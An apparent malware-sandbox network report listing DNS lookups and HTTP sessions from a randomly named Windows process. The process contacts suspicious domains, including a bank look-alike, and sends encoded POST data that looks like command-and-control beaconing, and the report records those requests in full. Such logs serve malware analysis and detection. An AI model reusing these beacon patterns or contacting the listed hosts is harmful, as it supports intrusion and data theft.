Oct 15, 2024 16:19:45.936171055 CEST	192.168.2.6	1.1.1.1	0x33b8	Standard query (0)	www.pelus-pijama-pro.shop	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:19:54.272120953 CEST	192.168.2.6	1.1.1.1	0x1bc6	Standard query (0)	www.cs0724sd92jj.cloud	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:19:55.274288893 CEST	192.168.2.6	1.1.1.1	0x1bc6	Standard query (0)	www.cs0724sd92jj.cloud	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:16.716188908 CEST	192.168.2.6	1.1.1.1	0xffa2	Standard query (0)	www.clientebradesco.online	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:30.359076977 CEST	192.168.2.6	1.1.1.1	0x269d	Standard query (0)	www.www00437.email	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:45.001075029 CEST	192.168.2.6	1.1.1.1	0x7ea7	Standard query (0)	www.anthonyholland.net	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:59.464804888 CEST	192.168.2.6	1.1.1.1	0x75ce	Standard query (0)	www.726075.buzz	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:21:13.340774059 CEST	192.168.2.6	1.1.1.1	0x528	Standard query (0)	www.siyue.xyz	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:21:22.170599937 CEST	192.168.2.6	1.1.1.1	0x874	Standard query (0)	www.oxilo.info	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:21:35.701035023 CEST	192.168.2.6	1.1.1.1	0xdfc0	Standard query (0)	www.farukugurluakdogan.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 15, 2024 16:19:16.295870066 CEST	1.1.1.1	192.168.2.6	0x47f4	No error (0)	www.redimpact.online		194.58.112.174	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:19:32.650319099 CEST	1.1.1.1	192.168.2.6	0x15c2	No error (0)	www.personal-loans-jp8.xyz		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:19:45.951471090 CEST	1.1.1.1	192.168.2.6	0x33b8	Name error (3)	www.pelus-pijama-pro.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:19:55.349127054 CEST	1.1.1.1	192.168.2.6	0x1bc6	No error (0)	www.cs0724sd92jj.cloud	yuanda.zhongshengxinyun.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 16:19:55.349127054 CEST	1.1.1.1	192.168.2.6	0x1bc6	No error (0)	yuanda.zhongshengxinyun.com		119.28.49.194	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:19:55.349144936 CEST	1.1.1.1	192.168.2.6	0x1bc6	No error (0)	www.cs0724sd92jj.cloud	yuanda.zhongshengxinyun.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 16:19:55.349144936 CEST	1.1.1.1	192.168.2.6	0x1bc6	No error (0)	yuanda.zhongshengxinyun.com		119.28.49.194	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		96.126.123.244	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		45.33.2.79	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		45.56.79.23	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		198.58.118.167	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		45.33.18.44	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		45.33.30.197	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		45.79.19.196	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		173.255.194.134	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		45.33.20.235	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		45.33.23.183	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		72.14.178.174	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:17.019424915 CEST	1.1.1.1	192.168.2.6	0xffa2	No error (0)	www.clientebradesco.online		72.14.185.43	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:31.092780113 CEST	1.1.1.1	192.168.2.6	0x269d	No error (0)	www.www00437.email	ff02.jog2798q68sjchze.app		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 16:20:31.092780113 CEST	1.1.1.1	192.168.2.6	0x269d	No error (0)	ff02.jog2798q68sjchze.app	tkdz666.w.keilao.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 16:20:31.092780113 CEST	1.1.1.1	192.168.2.6	0x269d	No error (0)	tkdz666.w.keilao.com		103.144.219.16	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:45.918092012 CEST	1.1.1.1	192.168.2.6	0x7ea7	No error (0)	www.anthonyholland.net	anthonyholland.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 16:20:45.918092012 CEST	1.1.1.1	192.168.2.6	0x7ea7	No error (0)	anthonyholland.net		84.32.84.32	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:20:59.478987932 CEST	1.1.1.1	192.168.2.6	0x75ce	No error (0)	www.726075.buzz		47.57.185.227	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:21:22.198594093 CEST	1.1.1.1	192.168.2.6	0x874	No error (0)	www.oxilo.info		162.0.213.94	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:21:35.798217058 CEST	1.1.1.1	192.168.2.6	0xdfc0	No error (0)	www.farukugurluakdogan.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 16:21:35.798217058 CEST	1.1.1.1	192.168.2.6	0xdfc0	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 16:21:35.798217058 CEST	1.1.1.1	192.168.2.6	0xdfc0	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.redimpact.online

www.personal-loans-jp8.xyz

www.cs0724sd92jj.cloud

www.clientebradesco.online

www.www00437.email

www.anthonyholland.net

www.726075.buzz

www.oxilo.info

www.farukugurluakdogan.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49900	194.58.112.174	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:19:16.320403099 CEST	513	OUT	GET /igto/?ahL=jjndrjuPIn2hz&K29=8YFnU67lyalxhD6YAq63dHcF/xhcFCtDVk0hyUkc2gzBxzKJj8V8IimbyLXPMQTMLAK7+VkEGKl8Gj8O4yEU8qEC1w2FZZ3CqCTV9KozHs3Tz6lE+0GGUrFl7yfd1ET9dx+BVAc= HTTP/1.1 Host: www.redimpact.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:19:17.251461029 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:19:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 72 65 64 69 6d 70 61 63 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 [TRUNCATED] Data Ascii: 24fc<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.redimpact.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg. [TRUNCATED]
Oct 15, 2024 16:19:17.251497984 CEST	1236	IN	Data Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.redimpact.online</h1><p class="b-parking__he
Oct 15, 2024 16:19:17.251512051 CEST	424	IN	Data Raw: d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_typ
Oct 15, 2024 16:19:17.251594067 CEST	1236	IN	Data Raw: 6f 6d 2d 6e 6f 6e 65 22 3e d0 9d d0 b0 d0 b4 d1 91 d0 b6 d0 bd d1 8b d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 Data Ascii: om-none">  </p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp
Oct 15, 2024 16:19:17.251605034 CEST	1236	IN	Data Raw: 3e d0 be d1 82 20 3c 62 20 63 6c 61 73 73 3d 22 62 2d 70 72 69 63 65 5f 5f 61 6d 6f 75 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c Data Ascii: > <b class="b-price__amount">83 <span class="char-rouble-native">₽</span> </b><span class="l-margin_left-small"> </span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><stro
Oct 15, 2024 16:19:17.251621962 CEST	1236	IN	Data Raw: bd d0 b5 d1 81 d0 b0 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 Data Ascii: </p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/sozdanie-saita/"></a></div><div class="b-parking__promo-item b-parking
Oct 15, 2024 16:19:17.251632929 CEST	1236	IN	Data Raw: d0 be d0 b2 d1 8b d1 81 d0 b8 d1 82 d0 b5 20 d0 b0 d0 b2 d1 82 d0 be d1 80 d0 b8 d1 82 d0 b5 d1 82 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d1 81 d1 80 d0 b5 d0 b4 d0 b8 20 d0 bf d0 be d1 81 d0 b5 d1 82 d0 b8 d1 82 d0 b5 d0 bb d0 b5 d0 b9 20 d0 b8 26 Data Ascii:     SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-aut
Oct 15, 2024 16:19:17.251645088 CEST	1236	IN	Data Raw: 61 6c 6c 62 61 63 6b 3d 6f 6e 64 61 74 61 27 3b 0a 20 20 20 20 20 20 20 20 73 63 72 69 70 74 2e 61 73 79 6e 63 20 3d 20 31 3b 0a 20 20 20 20 20 20 20 20 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 3c 2f 73 63 Data Ascii: allback=ondata'; script.async = 1; head.appendChild( script );</script><script>if ( 'www.redimpact.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny
Oct 15, 2024 16:19:17.251656055 CEST	555	IN	Data Raw: 66 20 28 64 6f 63 75 6d 65 6e 74 2e 73 63 72 69 70 74 73 5b 6a 5d 2e 73 72 63 20 3d 3d 3d 20 72 29 20 7b 20 72 65 74 75 72 6e 3b 20 7d 7d 0a 20 20 20 6b 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d Data Ascii: f (document.scripts[j].src === r) { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(9846632

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	53104	199.59.243.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:19:32.671806097 CEST	793	OUT	POST /slxf/ HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.personal-loans-jp8.xyz Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.personal-loans-jp8.xyz/slxf/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 4b 6e 67 41 38 58 59 33 4f 2f 41 61 71 78 70 4f 6f 6d 4c 50 43 6c 44 4d 45 2b 56 78 74 67 45 31 62 66 41 42 54 72 73 4d 69 6b 6d 79 50 6c 73 31 48 43 38 6c 63 34 30 35 74 67 2b 31 34 54 51 39 6c 2b 39 48 44 4a 33 4c 41 59 39 6f 5a 74 51 63 79 2f 7a 38 79 64 59 58 2f 64 4e 50 4f 6b 49 42 38 70 6e 68 45 67 61 43 6d 34 65 6f 48 56 4e 78 59 72 75 51 6a 54 6e 71 48 61 4f 57 33 59 30 56 6b 4c 37 57 70 41 7a 54 45 70 2b 79 6a 42 55 52 39 47 65 34 69 48 63 57 68 47 6f 62 4c 56 57 66 32 6b 38 6c 37 30 57 6a 4a 37 78 6e 45 30 5a 79 34 47 68 6e 42 4e 44 2b 52 4a 52 79 34 70 67 Data Ascii: K29=BZfl/Hh07lNLQKngA8XY3O/AaqxpOomLPClDME+VxtgE1bfABTrsMikmyPls1HC8lc405tg+14TQ9l+9HDJ3LAY9oZtQcy/z8ydYX/dNPOkIB8pnhEgaCm4eoHVNxYruQjTnqHaOW3Y0VkL7WpAzTEp+yjBUR9Ge4iHcWhGobLVWf2k8l70WjJ7xnE0Zy4GhnBND+RJRy4pg
Oct 15, 2024 16:19:33.440723896 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 15 Oct 2024 14:19:32 GMT content-type: text/html; charset=utf-8 content-length: 1158 x-request-id: 3197ae46-b99a-4fd5-b2ad-75854add0bdc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA== set-cookie: parking_session=3197ae46-b99a-4fd5-b2ad-75854add0bdc; expires=Tue, 15 Oct 2024 14:34:33 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 59 6b 4e 37 41 54 75 39 53 79 76 2b 76 37 33 59 5a 48 70 31 76 61 74 79 74 50 52 2f 72 6c 6b 58 6c 67 4e 35 77 31 69 43 37 67 68 4d 49 6b 2b 32 66 53 77 4c 6e 35 77 62 51 49 63 69 36 79 34 4b 54 47 61 58 66 4b 2f 58 68 4e 4f 30 71 35 30 65 52 75 4e 58 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 15, 2024 16:19:33.440741062 CEST	611	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzE5N2FlNDYtYjk5YS00ZmQ1LWIyYWQtNzU4NTRhZGQwYmRjIiwicGFnZV90aW1lIjoxNzI5MDAxOT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	53112	199.59.243.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:19:35.217031002 CEST	817	OUT	POST /slxf/ HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.personal-loans-jp8.xyz Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.personal-loans-jp8.xyz/slxf/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 71 33 67 54 50 76 59 78 75 2f 44 47 36 78 70 62 34 6e 43 50 43 68 44 4d 47 53 2f 78 65 49 45 31 36 76 41 41 53 72 73 50 69 6b 6d 6d 66 6c 6a 78 48 43 6a 6c 63 38 53 35 73 63 2b 31 34 58 51 39 6e 6d 39 48 51 52 32 45 77 59 7a 6e 35 74 53 59 79 2f 7a 38 79 64 59 58 2f 67 46 50 4e 55 49 42 4e 5a 6e 67 6c 67 62 42 6d 34 5a 68 6e 56 4e 36 34 72 51 51 6a 53 58 71 44 61 6b 57 30 67 30 56 68 33 37 58 39 55 77 5a 45 70 38 2f 44 41 45 57 6f 72 72 36 55 57 76 58 48 57 46 43 49 46 74 61 41 6c 6d 35 49 30 31 78 5a 62 7a 6e 47 73 72 79 59 47 4c 6c 42 31 44 73 47 46 32 39 4d 4d 44 33 78 78 31 4e 66 36 6e 6f 53 61 64 78 77 48 61 45 4f 48 76 33 41 3d 3d Data Ascii: K29=BZfl/Hh07lNLQq3gTPvYxu/DG6xpb4nCPChDMGS/xeIE16vAASrsPikmmfljxHCjlc8S5sc+14XQ9nm9HQR2EwYzn5tSYy/z8ydYX/gFPNUIBNZnglgbBm4ZhnVN64rQQjSXqDakW0g0Vh37X9UwZEp8/DAEWorr6UWvXHWFCIFtaAlm5I01xZbznGsryYGLlB1DsGF29MMD3xx1Nf6noSadxwHaEOHv3A==
Oct 15, 2024 16:19:35.836648941 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 15 Oct 2024 14:19:34 GMT content-type: text/html; charset=utf-8 content-length: 1158 x-request-id: 9b41f381-94fe-4f2d-9b3d-2e4282c75d7f cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA== set-cookie: parking_session=9b41f381-94fe-4f2d-9b3d-2e4282c75d7f; expires=Tue, 15 Oct 2024 14:34:35 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 59 6b 4e 37 41 54 75 39 53 79 76 2b 76 37 33 59 5a 48 70 31 76 61 74 79 74 50 52 2f 72 6c 6b 58 6c 67 4e 35 77 31 69 43 37 67 68 4d 49 6b 2b 32 66 53 77 4c 6e 35 77 62 51 49 63 69 36 79 34 4b 54 47 61 58 66 4b 2f 58 68 4e 4f 30 71 35 30 65 52 75 4e 58 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 15, 2024 16:19:35.836672068 CEST	611	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWI0MWYzODEtOTRmZS00ZjJkLTliM2QtMmU0MjgyYzc1ZDdmIiwicGFnZV90aW1lIjoxNzI5MDAxOT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	53113	199.59.243.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
